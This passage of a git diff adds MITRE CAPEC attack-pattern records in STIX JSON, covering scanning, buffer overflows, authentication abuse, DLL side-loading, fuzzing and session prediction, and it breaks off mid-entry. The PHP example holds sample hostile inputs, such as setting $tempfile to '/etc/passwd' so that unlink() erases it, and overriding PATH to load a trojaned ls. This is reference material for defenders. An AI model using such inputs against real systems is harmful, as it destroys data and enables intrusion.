a/capec/attack-pattern/attack-pattern--79392581-7f07-4d86-91a3-34c43f209265.json b/capec/attack-pattern/attack-pattern--79392581-7f07-4d86-91a3-34c43f209265.json new file mode 100644 index 0000000000..75dc4d9e5d --- /dev/null +++ b/capec/attack-pattern/attack-pattern--79392581-7f07-4d86-91a3-34c43f209265.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--a5336e1b-95b8-4a08-a555-736e55ee2ff1", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--79392581-7f07-4d86-91a3-34c43f209265", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: XSS in IMG Tags", + "description": "This attack pattern has been deprecated as it is contained in the existing attack pattern \"CAPEC-18 : XSS Targeting Non-Script Elements\". Please refer to this other CAPEC going forward.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/91.html", + "external_id": "CAPEC-91" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--796f2993-5a42-40de-b1f1-41299a74aebc.json b/capec/attack-pattern/attack-pattern--796f2993-5a42-40de-b1f1-41299a74aebc.json new file mode 100644 index 0000000000..afc5c53ec2 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--796f2993-5a42-40de-b1f1-41299a74aebc.json @@ -0,0 +1,77 @@ +{ + "type": "bundle", + "id": "bundle--936bcd1e-f117-4a1f-9e95-aa9f8a349ef2", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--796f2993-5a42-40de-b1f1-41299a74aebc", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Scanning for Vulnerable Software", + "description": "An attacker engages in scanning activity to find vulnerable software versions or types, such as operating system versions or network services. Vulnerable or exploitable network configurations, such as improperly firewalled systems, or misconfigured systems in the DMZ or external network, provide windows of opportunity for an attacker. Common types of vulnerable software include unpatched operating systems or services (e.g FTP, Telnet, SMTP, SNMP) running on open ports that the attacker has identified. Attackers usually begin probing for vulnerable software once the external network has been port scanned and potential targets have been revealed.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/310.html", + "external_id": "CAPEC-310" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "url": "http://www.faqs.org/rfcs/rfc793.html", + "external_id": "REF-128" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, The Art of Port Scanning (Volume: 7, Issue. 51), Phrack Magazine, 1997", + "url": "http://phrack.org/issues/51/11.html", + "external_id": "REF-130" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_prerequisites": [ + "Access to the network on which the targeted system resides.", + "Software tools used to probe systems over a range of ports and protocols." + ], + "x_capec_resources_required": [ + "Probing requires the ability to interactively send and receive data from a target, whereas passive listening requires a sufficient understanding of the protocol to analyze a preexisting channel of communication." + ], + "x_capec_skills_required": { + "Medium": "To probe a system remotely without detection requires careful planning and patience." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--79b94930-9a24-4f62-b56a-f1ce5a52e5ec.json b/capec/attack-pattern/attack-pattern--79b94930-9a24-4f62-b56a-f1ce5a52e5ec.json new file mode 100644 index 0000000000..f9eda2a57b --- /dev/null +++ b/capec/attack-pattern/attack-pattern--79b94930-9a24-4f62-b56a-f1ce5a52e5ec.json @@ -0,0 +1,102 @@ +{ + "type": "bundle", + "id": "bundle--35173b7e-d50b-4eeb-89bd-8e8e102871d4", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--79b94930-9a24-4f62-b56a-f1ce5a52e5ec", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Overflow Variables and Tags", + "description": "This type of attack leverages the use of tags or variables from a formatted configuration data to cause buffer overflow. The attacker crafts a malicious HTML page or configuration file that includes oversized strings, thus causing an overflow.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/46.html", + "external_id": "CAPEC-46" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html", + "external_id": "CWE-120" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/118.html", + "external_id": "CWE-118" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html", + "external_id": "CWE-119" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html", + "external_id": "CWE-74" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html", + "external_id": "CWE-680" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/733.html", + "external_id": "CWE-733" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html", + "external_id": "CWE-697" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_example_instances": [ + "\n Attack Example: Overflow Variables and Tags in MidiPlug\n A buffer overflow vulnerability exists in the Yamaha MidiPlug that can be accessed via a Text variable found in an EMBED tag.See also: CVE-1999-0946", + "\n Attack Example: Overflow Variables and Tags in Exim\n A buffer overflow in Exim allows local users to gain root privileges by providing a long :include: option in a .forward file.See also: CVE-1999-0971" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target program consumes user-controllable data in the form of tags or variables.", + "The target program does not perform sufficient boundary checking." + ], + "x_capec_skills_required": { + "High": "Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.", + "Low": "An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--79c04b52-b8bb-403a-ac63-f334307a69b2.json b/capec/attack-pattern/attack-pattern--79c04b52-b8bb-403a-ac63-f334307a69b2.json new file mode 100644 index 0000000000..efd682b938 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--79c04b52-b8bb-403a-ac63-f334307a69b2.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--57a4045d-7f34-4db2-bf43-905cf9210afa", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--79c04b52-b8bb-403a-ac63-f334307a69b2", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Physical Destruction of Device or Component", + "description": "An adversary conducts a physical attack a device or component, destroying it such that it no longer functions as intended.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/547.html", + "external_id": "CAPEC-547" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--79e5b44b-1780-4b0c-87d4-9391785c5074.json b/capec/attack-pattern/attack-pattern--79e5b44b-1780-4b0c-87d4-9391785c5074.json new file mode 100644 index 0000000000..e6946c2f25 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--79e5b44b-1780-4b0c-87d4-9391785c5074.json @@ -0,0 +1,41 @@ +{ + "type": "bundle", + "id": "bundle--d14d7f6d-9afd-4e45-a3e6-a060503c59b3", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--79e5b44b-1780-4b0c-87d4-9391785c5074", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-11-09T00:00:00.000Z", + "name": "Authentication Abuse", + "description": "An attacker obtains unauthorized access to an application, service or device either through knowledge of the inherent weaknesses of an authentication mechanism, or by exploiting a flaw in the authentication scheme's implementation. In such an attack an authentication mechanism is functioning but a carefully controlled sequence of events causes the mechanism to grant access to the attacker. This attack may exploit assumptions made by the target's authentication procedures, such as assumptions regarding trust relationships or assumptions regarding the generation of secret values. This attack differs from Authentication Bypass attacks in that Authentication Abuse allows the attacker to be certified as a valid user through illegitimate means, while Authentication Bypass allows the user to access protected material without ever being certified as an authenticated user. This attack does not rely on prior sessions established by successfully authenticating users, as relied upon for the \"Exploitation of Session Variables, Resource IDs and other Trusted Credentials\" attack patterns.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/114.html", + "external_id": "CAPEC-114" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html", + "external_id": "CWE-287" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_prerequisites": [ + "An authentication mechanism or subsystem implementing some form of authentication such as passwords, digest authentication, security certificates, etc. which is flawed in some way." + ], + "x_capec_resources_required": [ + "A client application, command-line access to a binary, or scripting language capable of interacting with the authentication mechanism." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--7a4fd69c-ba2e-4a7a-b5df-455180c33ce8.json b/capec/attack-pattern/attack-pattern--7a4fd69c-ba2e-4a7a-b5df-455180c33ce8.json new file mode 100644 index 0000000000..861bbaf36f --- /dev/null +++ b/capec/attack-pattern/attack-pattern--7a4fd69c-ba2e-4a7a-b5df-455180c33ce8.json @@ -0,0 +1,116 @@ +{ + "type": "bundle", + "id": "bundle--f5a2cc14-3c76-4294-86a0-1a21dead95d6", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--7a4fd69c-ba2e-4a7a-b5df-455180c33ce8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Manipulating User-Controlled Variables", + "description": "This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An attacker can override environment variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the attacker can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/77.html", + "external_id": "CAPEC-77" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/473.html", + "external_id": "CWE-473" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/15.html", + "external_id": "CWE-15" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html", + "external_id": "CWE-285" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/302.html", + "external_id": "CWE-302" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/94.html", + "external_id": "CWE-94" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/96.html", + "external_id": "CWE-96" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Artur Maj, Securing PHP: Step-by-Step, 2003--06---22, Security Focus", + "url": "http://www.securityfocus.com/infocus/1706", + "external_id": "REF-520" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Clancy Malcolm, Ten Security Checks for PHP, Part 1, 2003--03---20", + "external_id": "REF-521" + }, + { + "source_name": "reference_from_CAPEC", + "description": "PHP Manual, The PHP Group", + "url": "http://www.php.net/manual/en/security.globals.php", + "external_id": "REF-522" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_example_instances": [ + "\n Attack Example: PHP Global Variables\n PHP is a study in bad security. The main idea pervading PHP is \"ease of use,\" and the mantra \"don't make the developer go to any extra work to get stuff done\" applies in all cases. This is accomplished in PHP by removing formalism from the language, allowing declaration of variables on first use, initializing everything with preset values, and taking every meaningful variable from a transaction and making it available. In cases of collision with something more technical, the simple almost always dominates in PHP.\n One consequence of all this is that PHP allows users of a Web application to override environment variables with user-supplied, untrusted query variables. Thus, critical values such as the CWD and the search path can be overwritten and directly controlled by a remote anonymous user.\n Another similar consequence is that variables can be directly controlled and assigned from the user-controlled values supplied in GET and POST request fields. So seemingly normal code like this, does bizarre things:\n while($count < 10){// Do something$count++;}\n Normally, this loop will execute its body ten times. The first iteration will be an undefined zero, and further trips though the loop will result in an increment of the variable $count. The problem is that the coder does not initialize the variable to zero before entering the loop. This is fine because PHP initializes the variable on declaration. The result is code that seems to function, regardless of badness. The problem is that a user of the Web application can supply a request such as\n GET /login.php?count=9\n and cause $count to start out at the value 9, resulting in only one trip through the loop. Yerg.\n Depending on the configuration, PHP may accept user-supplied variables in place of environment variables. PHP initializes global variables for all process environment variables, such as $PATH and $HOSTNAME. These variables are of critical importance because they may be used in file or network operations. If an attacker can supply a new $PATH variable (such as PATH='/var'), the program may be exploitable.\n PHP may also take field tags supplied in GET/POST requests and transform them into global variables. This is the case with the $count variable we explored in our previous example.\n Consider another example of this problem in which a program defines a variable called $tempfile. An attacker can supply a new temp file such as $tempfile = \"/etc/passwd\". Then the temp file may get erased later via a call to unlink($tempfile);. Now the passwd file has been erased--a bad thing indeed on most OSs.\n Also consider that the use of include() and require() first search $PATH, and that using calls to the shell may execute crucial programs such as ls. In this way, ls may be \"Trojaned\" (the attacker can modify $PATH to cause a Trojan copy of ls to be loaded). This type of attack could also apply to loadable libraries if $LD_LIBRARY_PATH is modified.\n Finally, some versions of PHP may pass user data to syslog as a format string, thus exposing the application to a format string buffer overflow.See also: File upload allows arbitrary file read by setting hidden form variables to match internal variable names (CVE-2000-0860)" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "A variable consumed by the application server is exposed to the client.", + "A variable consumed by the application server can be overwritten by the user.", + "The application server trusts user supplied data to compute business logic.", + "The application server does not perform proper input validation." + ], + "x_capec_skills_required": { + "Low": "The malicious user can easily try some well-known global variables and find one which matches.", + "Medium": "The attacker can use automated tools to probe for variables that she can control." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--7a84ee4e-66e0-435f-bbcc-0eeb394a16b6.json b/capec/attack-pattern/attack-pattern--7a84ee4e-66e0-435f-bbcc-0eeb394a16b6.json new file mode 100644 index 0000000000..8df6499edd --- /dev/null +++ b/capec/attack-pattern/attack-pattern--7a84ee4e-66e0-435f-bbcc-0eeb394a16b6.json @@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--2e5a73e1-8c7d-46b5-b3d4-17588937944b", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--7a84ee4e-66e0-435f-bbcc-0eeb394a16b6", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Sustained Client Engagement", + "description": "An adversary attempts to deny legitimate users access to a resource by continually engaging a specific resource in an attempt to keep the resource tied up as long as possible. The adversary's primary goal is not to crash or flood the target, which would alert defenders; rather it is to repeatedly perform actions or abuse algorithmic flaws such that a given resource is tied up and not available to a legitimate user. By carefully crafting a requests that keep the resource engaged through what is seemingly benign requests, legitimate users are limited or completely denied access to the resource. The degree to which the attack is successful depends upon the adversary's ability to sustain resource requests over time with a volume that exceeds the normal usage by legitimate users, as well as other mitigating circumstances such as the target's ability to shift load or acquire additional resources to deal with the depletion. This attack differs from a flooding attack as it is not entirely dependent upon large volumes of requests, and it differs from resource leak exposures which tend to exploit the surrounding environment needed for the resource to function. The key factor in a sustainment attack are the repeated requests that take longer to process than usual.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/227.html", + "external_id": "CAPEC-227" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_prerequisites": [ + "This pattern of attack requires a temporal aspect to the servicing of a given request. Success can be achieved if the adversary can make requests that collectively take more time to complete than legitimate user requests within the same time frame." + ], + "x_capec_resources_required": [ + "To successfully execute this pattern of attack, a script or program is often required that is capable of continually engaging the target and maintaining sustained usage of a specific resource. Depending on the configuration of the target, it may or may not be necessary to involve a network or cluster of objects all capable of making parallel requests." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--7a90f137-ad2f-4c28-b951-0cfcd2e30adb.json b/capec/attack-pattern/attack-pattern--7a90f137-ad2f-4c28-b951-0cfcd2e30adb.json new file mode 100644 index 0000000000..5531528d3c --- /dev/null +++ b/capec/attack-pattern/attack-pattern--7a90f137-ad2f-4c28-b951-0cfcd2e30adb.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--c13bac7b-2037-4362-82c9-c7e8b1834615", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--7a90f137-ad2f-4c28-b951-0cfcd2e30adb", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "DLL Side-Loading", + "description": "An adversary places a malicious version of a Dynamic-Link Library (DLL) in the Windows Side-by-Side (WinSxS) directory to trick the operating system into loading this malicious DLL instead of a legitimate DLL. Programs specify the location of the DLLs to load via the use of WinSxS manifests or DLL redirection and if they aren't used then Windows searches in a predefined set of directories to locate the file. If the applications improperly specify a required DLL or WinSxS manifests aren't explicit about the characteristics of the DLL to be loaded, they can be vulnerable to side-loading.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/641.html", + "external_id": "CAPEC-641" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/706.html", + "external_id": "CWE-706" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stewart A., DLL SIDE-LOADING: A Thorn in the Side of the Anti-Virus Industry, FireEye", + "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf", + "external_id": "REF-501" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Integrity": [ + "Execute Unauthorized Commands", + "Bypass Protection Mechanism" + ] + }, + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The target must fail to verify the integrity of the DLL before using them." + ], + "x_capec_skills_required": { + "High": "Trick the operating system in loading a malicious DLL instead of a legitimate DLL." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--7aac9a89-6d2b-4d81-adb9-44aecaed57bf.json b/capec/attack-pattern/attack-pattern--7aac9a89-6d2b-4d81-adb9-44aecaed57bf.json new file mode 100644 index 0000000000..1886bde7a2 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--7aac9a89-6d2b-4d81-adb9-44aecaed57bf.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--64942d6d-38ec-45e7-b160-780ebc26564b", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--7aac9a89-6d2b-4d81-adb9-44aecaed57bf", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "Resource Injection", + "description": "An adversary exploits weaknesses in input validation by manipulating resource identifiers enabling the unintended modification or specification of a resource.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/240.html", + "external_id": "CAPEC-240" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/99.html", + "external_id": "CWE-99" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target application allows the user to both specify the identifier used to access a system resource. Through this permission, the user gains the capability to perform actions on that resource (e.g., overwrite the file)" + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--7afbfdbc-8262-48b9-b349-cc7888fc880f.json b/capec/attack-pattern/attack-pattern--7afbfdbc-8262-48b9-b349-cc7888fc880f.json new file mode 100644 index 0000000000..c71095e409 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--7afbfdbc-8262-48b9-b349-cc7888fc880f.json @@ -0,0 +1,76 @@ +{ + "type": "bundle", + "id": "bundle--6bf63419-435f-44de-a4f6-1cc84110e548", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--7afbfdbc-8262-48b9-b349-cc7888fc880f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "name": "Fuzzing", + "description": "In this attack pattern, the adversary leverages fuzzing to try to identify weaknesses in the system. Fuzzing is a software security and functionality testing method that feeds randomly constructed input to the system and looks for an indication that a failure in response to that input has occurred. Fuzzing treats the system as a black box and is totally free from any preconceptions or assumptions about the system. Fuzzing can help an attacker discover certain assumptions made about user input in the system. Fuzzing gives an attacker a quick way of potentially uncovering some of these assumptions despite not necessarily knowing anything about the internals of the system. These assumptions can then be turned against the system by specially crafting user input that may allow an attacker to achieve his goals.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/28.html", + "external_id": "CAPEC-28" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html", + "external_id": "CWE-74" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/388.html", + "external_id": "CWE-388" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Unreliable Execution", + "Alter Execution Logic" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges", + "Alter Execution Logic" + ], + "Integrity": [ + "Modify Data", + "Alter Execution Logic" + ] + }, + "x_capec_example_instances": [ + "A fuzz test reveals that when data length for a particular field exceeds certain length, the input validation filter fails and lets the user data in unfiltered. This provides an attacker with an injection vector to deliver the malicious payload into the system." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_resources_required": [ + "Fuzzing tools." + ], + "x_capec_skills_required": { + "Low": "There is a wide variety of fuzzing tools available." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--7b1c66c0-d2c1-4283-910e-dc80f0dd53ff.json b/capec/attack-pattern/attack-pattern--7b1c66c0-d2c1-4283-910e-dc80f0dd53ff.json new file mode 100644 index 0000000000..ccb6277469 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--7b1c66c0-d2c1-4283-910e-dc80f0dd53ff.json @@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--aa713aed-6d5a-4e8e-97c8-020fa803d40c", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--7b1c66c0-d2c1-4283-910e-dc80f0dd53ff", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Cellular Broadcast Message Request", + "description": "In this attack scenario, the attacker uses knowledge of the target\u2019s mobile phone number (i.e., the number associated with the SIM used in the retransmission device) to cause the cellular network to send broadcast messages to alert the mobile device. Since the network knows which cell tower the target\u2019s mobile device is attached to, the broadcast messages are only sent in the Location Area Code (LAC) where the target is currently located. By triggering the cellular broadcast message and then listening for the presence or absence of that message, an attacker could verify that the target is in (or not in) a given location.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/618.html", + "external_id": "CAPEC-618" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html", + "external_id": "CWE-201" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Denis Foo Kune, John Koelndorfer, Nicholas Hopper, Yongdae Kim, Location Leaks on the GSM Air Interface, University of Minnesota", + "url": "https://www-users.cs.umn.edu/~hoppernj/celluloc.pdf", + "external_id": "REF-487" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Other": [ + "Other (An attacker could verify that the target is in (or not in) a given location.)" + ] + }, + "x_capec_prerequisites": [ + "The attacker must have knowledge of the target\u2019s mobile phone number." + ], + "x_capec_skills_required": { + "Low": "Open source and commercial tools are available for this attack." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--7b38c275-4653-4cef-9a72-cb2d53a1e11e.json b/capec/attack-pattern/attack-pattern--7b38c275-4653-4cef-9a72-cb2d53a1e11e.json new file mode 100644 index 0000000000..a12d4a6029 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--7b38c275-4653-4cef-9a72-cb2d53a1e11e.json @@ -0,0 +1,120 @@ +{ + "type": "bundle", + "id": "bundle--fadc0e44-8991-4569-baad-d705d35f6eec", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--7b38c275-4653-4cef-9a72-cb2d53a1e11e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Session Credential Falsification through Prediction", + "description": "This attack targets predictable session ID in order to gain privileges. The attacker can predict the session ID used during a transaction to perform spoofing and session hijacking.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/59.html", + "external_id": "CAPEC-59" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html", + "external_id": "CWE-290" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/330.html", + "external_id": "CWE-330" + }, + { + "source_name": "cwe", + "url": 